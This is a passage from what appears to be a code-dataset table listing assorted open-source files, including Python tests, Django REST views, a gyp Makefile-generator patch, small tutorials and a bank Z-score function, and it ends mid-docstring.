hexsha (stringlengths, 40-40) | size (int64, 6-782k) | ext (stringclasses, 7 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths, 4-237) | max_stars_repo_name (stringlengths, 6-72) | max_stars_repo_head_hexsha (stringlengths, 40-40) | max_stars_repo_licenses (list) | max_stars_count (int64, 1-53k, nullable) | max_stars_repo_stars_event_min_datetime (stringlengths, 24-24, nullable) | max_stars_repo_stars_event_max_datetime (stringlengths, 24-24, nullable) | max_issues_repo_path (stringlengths, 4-184) | max_issues_repo_name (stringlengths, 6-72) | max_issues_repo_head_hexsha (stringlengths, 40-40) | max_issues_repo_licenses (list) | max_issues_count (int64, 1-27.1k, nullable) | max_issues_repo_issues_event_min_datetime (stringlengths, 24-24, nullable) | max_issues_repo_issues_event_max_datetime (stringlengths, 24-24, nullable) | max_forks_repo_path (stringlengths, 4-184) | max_forks_repo_name (stringlengths, 6-72) | max_forks_repo_head_hexsha (stringlengths, 40-40) | max_forks_repo_licenses (list) | max_forks_count (int64, 1-12.2k, nullable) | max_forks_repo_forks_event_min_datetime (stringlengths, 24-24, nullable) | max_forks_repo_forks_event_max_datetime (stringlengths, 24-24, nullable) | content (stringlengths, 6-782k) | avg_line_length (float64, 2.75-664k) | max_line_length (int64, 5-782k) | alphanum_fraction (float64, 0-1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0c3eba736f647bf4da4d0331426a996dececb82e
| 662 |
py
|
Python
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2016-01-29T18:05:29.000Z
|
2021-10-06T04:21:55.000Z
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2015-04-06T19:03:32.000Z
|
2019-05-28T13:34:55.000Z
|
globals/browsers.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 18 |
2015-04-06T17:42:31.000Z
|
2021-10-06T04:26:29.000Z
|
browsers = [
{
'id': 'chrome',
'name': 'Chrome'
},
{
'id': 'chromium',
'name': 'Chromium'
},
{
'id': 'firefox',
'name': 'Firefox'
},
{
'id': 'safari',
'name': 'Safari'
},
{
'id': 'msie',
'name': 'Internet Explorer'
},
{
'id': 'msedge',
'name': 'Microsoft Edge'
},
{
'id': 'opera',
'name': 'Opera'
},
{
'id': 'yandexbrowser',
'name': 'Yandex.Browser'
},
{
'id': 'ios',
'name': 'iOS'
},
{
'id': 'android',
'name': 'Android'
},
{
'id': 'samsungBrowser',
'name': 'Samsung Internet'
}
]
| 13.791667 | 32 | 0.380665 |
a76cedf207ceaf1dba4e55be50b4825c950cf26b
| 282 |
py
|
Python
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/Tkinter/TkinterCourse/31_img.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from tkinter import *
canvas_width = 1200
canvas_height = 700
master = Tk()
canvas = Canvas(master,
width=canvas_width,
height=canvas_height)
canvas.pack()
img = PhotoImage(file="python1.png")
canvas.create_image(20,20, anchor=NW, image=img)
mainloop()
| 16.588235 | 48 | 0.687943 |
ac6c41a6e70911398c2e4b2ef3e3cdf63f92af8e
| 284 |
py
|
Python
|
pacman-arch/test/pacman/tests/epoch001.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/epoch001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/epoch001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Sysupgrade with a sync package having higher epoch"
sp = pmpkg("dummy", "1:1.0-1")
self.addpkg2db("sync", sp)
lp = pmpkg("dummy", "1.1-1")
self.addpkg2db("local", lp)
self.args = "-Su"
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_VERSION=dummy|1:1.0-1")
| 21.846154 | 71 | 0.68662 |
5a743522463540cb50f845c916172aa0aeb13ce3
| 1,156 |
py
|
Python
|
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/object_introduce.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
"""
对象 = 属性 + 方法
"""
class Turtle: # Python 中的类名约定以大写字母开头
"""关于类的一个简单例子"""
# 属性
color = 'green'
weight = 10
legs = 4
shell = True
mouth = '大嘴'
# 方法
def climb(self):
print('我正在很努力的向前爬....')
def run(self):
print('我正在快速的向前跑.....')
def bite(self):
print('咬你......')
def eat(self):
print('有的吃......')
def sleep(self):
print('困了,睡了......')
"""
tt = Turtle
print(tt)
tt1 = Turtle()
print(tt1)
tt.bite('')
"""
# 面向对象特性1:封装
print('------------------------------------------')
list1 = [2, 1, 7, 5, 3]
list1.sort()
print(list1)
list1.append(9)
print(list1)
print('------------------------------------------')
# 面向对象特性2:继承
# 子类自动共享父类之间数据和方法的机制
class MyList(list):
pass
list2 = MyList()
list2.append(5)
list2.append(3)
list2.append(7)
print(list2)
list2.sort()
print(list2)
print('------------------------------------------')
# 面向对象特性3:多态
class A:
def fun(self):
print('我是小A...')
class B:
def fun(self):
print('我是小B...')
a = A()
b = B()
a.fun()
b.fun()
print('------------------------------------------')
| 13.6 | 51 | 0.439446 |
b2d8c07d3c9158693e0174a80f7ca8a486fcee1e
| 5,573 |
py
|
Python
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CircleCI/Integrations/CircleCI/CircleCI_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import io
import json
import pytest
from typing import Tuple, Dict
from CircleCI import Client, circleci_workflows_list_command, circleci_artifacts_list_command, \
circleci_workflow_jobs_list_command, circleci_workflow_last_runs_command, DEFAULT_LIMIT_VALUE
from CommonServerPython import CommandResults
fake_client = Client('', '', False, False, '', '', '')
def util_load_json(path):
    with io.open(path, mode='r', encoding='utf-8') as f:
        return json.loads(f.read())
test_data = util_load_json('test_data/circle_ci_commands_test_data.json')
@pytest.mark.parametrize('command_func, func_name',
[(circleci_workflows_list_command, 'get_workflows_list'),
(circleci_artifacts_list_command, 'get_job_artifacts'),
(circleci_workflow_jobs_list_command, 'get_workflow_jobs'),
(circleci_workflow_last_runs_command, 'get_last_workflow_runs')])
def test_circleci_commands(mocker, command_func, func_name):
"""
Given:
- 'args': XSOAR arguments
When:
- Executing a CircleCI command.
Then:
- Ensure expected CommandResults object is returned.
"""
command_test_data = test_data[func_name]
mocker.patch.object(fake_client, func_name, return_value=command_test_data['response'])
result: CommandResults = command_func(fake_client, dict())
assert result.outputs_prefix == command_test_data['outputs_prefix']
assert result.outputs_key_field == command_test_data['outputs_key_field']
assert result.outputs == command_test_data['outputs']
GET_COMMON_ARGUMENTS_INPUTS = [(Client('', '', False, False, vc_type='a', organization='b', project='c'), dict(),
('a', 'b', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x'}, ('x', 'b', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x'}, ('a', 'x', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'project': 'x'}, ('a', 'b', 'x', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'limit': 1}, ('a', 'b', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'limit': 1}, ('x', 'b', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'limit': 1}, ('a', 'x', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'project': 'x', 'limit': 1}, ('a', 'b', 'x', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y'}, ('x', 'y', 'c', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'project': 'y'}, ('x', 'b', 'y', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'project': 'y'}, ('a', 'x', 'y', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'project': 'z'},
('x', 'y', 'z', DEFAULT_LIMIT_VALUE)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'limit': 1},
('x', 'y', 'c', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'project': 'y', 'limit': 1},
('x', 'b', 'y', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'organization': 'x', 'project': 'y', 'limit': 1},
('a', 'x', 'y', 1)),
(Client('', '', False, False, vc_type='a', organization='b', project='c'),
{'vcs_type': 'x', 'organization': 'y', 'project': 'z', 'limit': 1},
('x', 'y', 'z', 1)),
]
@pytest.mark.parametrize('client, args, expected', GET_COMMON_ARGUMENTS_INPUTS)
def test_get_common_arguments(client: Client, args: Dict, expected: Tuple[str, str, str, int]):
"""
Given:
- XSOAR arguments
When:
- Extracting common used args for few commands.
Then
- Ensure the common commands are extracted as expected, and uses default value of instance parameter if not found.
"""
from CircleCI import get_common_arguments
assert get_common_arguments(client, args) == expected
| 55.73 | 118 | 0.499372 |
336f1b7a21506cfec58038472545773c94776183
| 6,053 |
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-pylib_gyp_generator_make.py,v 1.4 2014/08/25 13:20:12 fhajny Exp $
Force platform libtool on Darwin, see
https://code.google.com/p/gyp/issues/detail?id=354&q=libtool
Also, don't try to use thin archives on NetBSD, they appear not to work
("ar t <archive>" says "Malformed archive").
--- pylib/gyp/generator/make.py.orig 2014-07-14 14:19:49.000000000 +0000
+++ pylib/gyp/generator/make.py
@@ -167,9 +167,83 @@ quiet_cmd_solink_module = SOLINK_MODULE(
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
+LINK_COMMANDS_NETBSD = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
+LINK_COMMANDS_SOLARIS = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
-cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
+cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool /usr/bin/libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
@@ -350,7 +424,7 @@ sed -e "s|^$(notdir $@)|$@|" $(depfile).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
-sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
+env NL=`printf "\n"` sed -e 's|\\||' -e 's| |${NL}|g' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
@@ -2044,6 +2118,7 @@ def GenerateOutput(target_list, target_d
header_params.update({
'flock': './gyp-flock-tool flock',
'flock_index': 2,
+ 'link_commands': LINK_COMMANDS_SOLARIS,
})
elif flavor == 'freebsd':
# Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
@@ -2056,6 +2131,11 @@ def GenerateOutput(target_list, target_d
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
+ elif flavor == 'netbsd':
+ header_params.update({
+ 'link_commands': LINK_COMMANDS_NETBSD,
+ })
+
header_params.update({
'CC.target': GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
| 48.424 | 181 | 0.660995 |
682006cc2da0265d494def28096008e59c9efc4d
| 257 |
py
|
Python
|
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
AFluentPython/process_thread/multiprocess.py
|
RoboCuper-hujinlei/AI-Job
|
cf7a081d59700d75f0f2dc73b6d5130863796f01
|
[
"Apache-2.0"
] | null | null | null |
"""
python multiprocessing 跨平台多进程模块
"""
from multiprocessing import Process
import os
def run_proc(name):
print(f'Run child process {name}: ({os.getpid()})...')
# run_proc('th1')
if __name__ == '__main__':
print(f'Parent process: {os.getpid()}')
| 18.357143 | 58 | 0.673152 |
68478ff3680d97ad6b7fff54608144d9b26e853e
| 2,047 |
py
|
Python
|
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
backend/products/views.py
|
saulhappy/drf
|
5e62da54cdf0f0fead742c891d34e7eacd488a1b
|
[
"MIT"
] | null | null | null |
from requests import request
from rest_framework import generics, permissions
from api.mixins import StaffEditorPermissionMixin, UserQuerySetMixin
from products.models import Product
from products.serializers import ProductSerializer
class ProductDetailAPIView(
    UserQuerySetMixin, generics.RetrieveAPIView, StaffEditorPermissionMixin
):
    queryset = Product.objects.all()
    serializer_class = ProductSerializer


class ProductListCreateAPIView(
    UserQuerySetMixin, StaffEditorPermissionMixin, generics.ListCreateAPIView
):
    queryset = Product.objects.all()
    serializer_class = ProductSerializer

    def perform_create(self, serializer):
        title = serializer.validated_data.get("title")
        content = serializer.validated_data.get("content") or None
        if content is None:
            content = title
        serializer.save(content=content, user=self.request.user)

    # now UserQuerySetMixin does this role
    # def get_queryset(self):
    #     qs = super().get_queryset()
    #     request = self.request
    #     user = self.request.user
    #     if not user.is_authenticated:
    #         return Product.objects.none()
    #     return qs.filter(user=request.user)


product_list_create_view = ProductListCreateAPIView.as_view()


class ProductUpdateAPIView(
    UserQuerySetMixin, generics.UpdateAPIView, StaffEditorPermissionMixin
):
    queryset = Product.objects.all()
    serializer_class = ProductSerializer
    lookup_field = "pk"

    def perform_update(self, serializer):
        instance = serializer.save()
        if not instance.content:
            instance.content = instance.title


product_update_view = ProductUpdateAPIView.as_view()


class ProductDestroyAPIView(
    UserQuerySetMixin, generics.DestroyAPIView, StaffEditorPermissionMixin
):
    queryset = Product.objects.all()
    serializer_class = ProductSerializer
    lookup_field = "pk"
    def perform_destroy(self, instance):
        super().perform_destroy(instance)
product_delete_view = ProductDestroyAPIView.as_view()
| 29.666667 | 77 | 0.740107 |
04587c005a73d1b54891b78c8cea19137fd9377b
| 2,001 |
py
|
Python
|
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | 2 |
2020-11-25T07:53:48.000Z
|
2021-09-19T14:19:51.000Z
|
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | null | null | null |
Calculation/calculation_with_D.py
|
Tocha4/-Displacement--Chromatography
|
0baf4f9e2d23b39f610217b048d799c6403a259e
|
[
"MIT"
] | null | null | null |
import time
import numpy as np
from column_01 import Column
from pump_01 import Pump
from sample_01 import Sample
from interaction_01 import Interaction
from calculation_current import Simu
import os
print(os.listdir())
if 'functions_with_D' in os.listdir():
    from functions_with_D import Functions
else:
    from Calculation.functions_with_D import Functions

class Simu_with_D(Simu):
    def simulation(self):
        const1 = -(self.Column.dz/(self.Column.dt*self.Column.velocity))
        F = self.Column.F*const1
        const1_1 = 1+const1
        inter = list(self.Interaction.ads_max*self.Interaction.adsorption)
        qq, cc = Functions.simulation_with_D(self.num_time_steps, self.num_length_steps,
                                             self.Interaction.adsorption,
                                             self.C, len(self.num_components),
                                             self.q, inter, const1_1, const1, F)
        self.q = np.array(qq)
        self.C = np.array(cc)
        return self.q, self.C

    # def __init__(self, Sample, Column, Interaction, Pump, time_factor=1):
    #     super().__init__(Sample, Column, Interaction, Pump, time_factor=1)
    #     print(self.Sample.a)

if __name__ == '__main__':
    n = 3
    a = time.time()
    sample = Sample(volume=0.1, composition=np.ones(n)/n, concentration=1,
                    a=np.linspace(1, 40, n), adsorption_max=np.linspace(0.025, 0.04, n))
    sample.disp_concentration = [0 for _ in range(n)]
    sample.disp_concentration[-1] = 0.025
    pump = Pump(1)
    column = Column([1, 20], 5*10**(-3), 0.635, pump, CFL=0.35)
    interaction = Interaction(sample)
    sim = Simu_with_D(sample, column, interaction, pump, time_factor=1)
    #%%
    sim.injection()
    #%%
    sim.simulation()
    # q = np.array(q)
    # C = np.array(C)
    b = time.time()
    Ausgabe = 'for {} points the program needs {} seconds'.format(np.product(sim.C.shape), (b - a))
    print(Ausgabe)
| 31.761905 | 101 | 0.616692 |
501d4569b58f1c43016a07aee0dd51437c1d48ce
| 351 |
py
|
Python
|
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/solution_02_10_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
nlp = spacy.load("pt_core_news_md")
doc = nlp("Visitamos um excelente restaurante. Em seguida fomos a um ótimo bar.")
# Create spans for "excelente restaurante" and "ótimo bar"
span1 = doc[2:4]
span2 = doc[10:12]
print(span1)
print(span2)
# Get the similarity of the spans
similarity = span1.similarity(span2)
print(similarity)
| 21.9375 | 81 | 0.754986 |
a8778a2d8f225995842a7529f1610fcb2971dcff
| 501 |
py
|
Python
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/examples/packages/package_cythran/package_cythran/calcul.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import numpy as np
from transonic import boost, Type, Array, NDim, set_backend_for_this_module
set_backend_for_this_module("pythran")
T = Type(np.int32, np.float64, np.float32)
A = Array[T, NDim(2)]
@boost
def laplace(image: A):
"""Laplace operator in NumPy for 2D images."""
laplacian = (
image[:-2, 1:-1]
+ image[2:, 1:-1]
+ image[1:-1, :-2]
+ image[1:-1, 2:]
- 4 * image[1:-1, 1:-1]
)
thresh = np.abs(laplacian) > 0.05
return thresh
| 21.782609 | 75 | 0.588822 |
a8ae472868a80064b156a405655f56ad60391a28
| 433 |
py
|
Python
|
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | 46 |
2022-01-08T12:03:24.000Z
|
2022-03-30T08:51:05.000Z
|
Webpage/blog/forms.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
from django.forms import ModelForm
from django.core.exceptions import ValidationError
from django.forms import fields
from django.utils.translation import ugettext_lazy as _
from phonenumber_field.formfields import PhoneNumberField
from tinymce.widgets import TinyMCE
from .models import blogPost
class newBlogEntry(ModelForm):
    class Meta:
        model = blogPost
        fields = ['titel', 'text']
| 25.470588 | 57 | 0.789838 |
508b6d222804fc63d4cc0b8698c950410b3c8c75
| 2,578 |
py
|
Python
|
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 31 |
2020-06-17T13:19:12.000Z
|
2022-03-27T08:56:38.000Z
|
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | null | null | null |
frds/measures/func_bank_z_score.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 8 |
2020-06-14T15:21:51.000Z
|
2021-09-29T06:28:53.000Z
|
import numpy as np
def z_score(roa: float, capital_ratio: float, past_roas: np.ndarray) -> float:
r"""Z-score
A measure of bank insolvency risk, defined as:
$$
\text{Z-score} = \frac{\text{ROA}+\text{CAR}}{\sigma_{\text{ROA}}}
$$
where $\text{ROA}$ is the bank's ROA, $\text{CAR}$ is the bank's capital ratio and $\sigma_{\text{ROA}}$
is the standard deviation of bank ROA.
The rationale behind Z-score is simple. A bank is insolvent when its loss $-\pi$ exceeds equity $E$, i.e., $-\pi>E$.
The probability of insolvency is $P(-\pi>E)$.
If bank assets is $A$, then $P(-\pi>E)=P(-\frac{\pi}{A}>\frac{E}{A})=P(-ROA>CAR)$.
Assuming profits are normally distributed, then scaling $(\text{ROA}+\text{CAR})$ by $\sigma_{\text{ROA}}$ yields an
estimate of the distance to insolvency.
A higher Z-score implies that larger shocks to profitability are required to cause the losses to exceed bank equity.
Args:
roa (float): the current bank ROA.
capital_ratio (float): the current bank equity to asset ratio.
past_roas (np.ndarray): (n_periods,) array of past bank ROAs used to calculate the standard deviation.
Returns:
float: The bank's Z-score
Examples:
>>> from frds.measures.bank import z_score
>>> import numpy as np
>>> z_score(roa=0.2, capital_ratio=0.5, past_roas=np.array([0.1,0.2,0.15,0.18,0.2]))
18.549962900111296
References:
* [Laeven and Levine (2009)](https://doi.org/10.1016/j.jfineco.2008.09.003),
Bank governance, regulation and risk taking, *Journal of Financial Economics*, 93, 2, 259-275.
* [Houston, Lin, Lin and Ma (2010)](https://doi.org/10.1016/j.jfineco.2010.02.008),
Creditor rights, information sharing, and bank risk taking, *Journal of Financial Economics*, 96, 3, 485-512.
* [Beck, De Jonghe, and Schepens (2013)](https://doi.org/10.1016/j.jfi.2012.07.001),
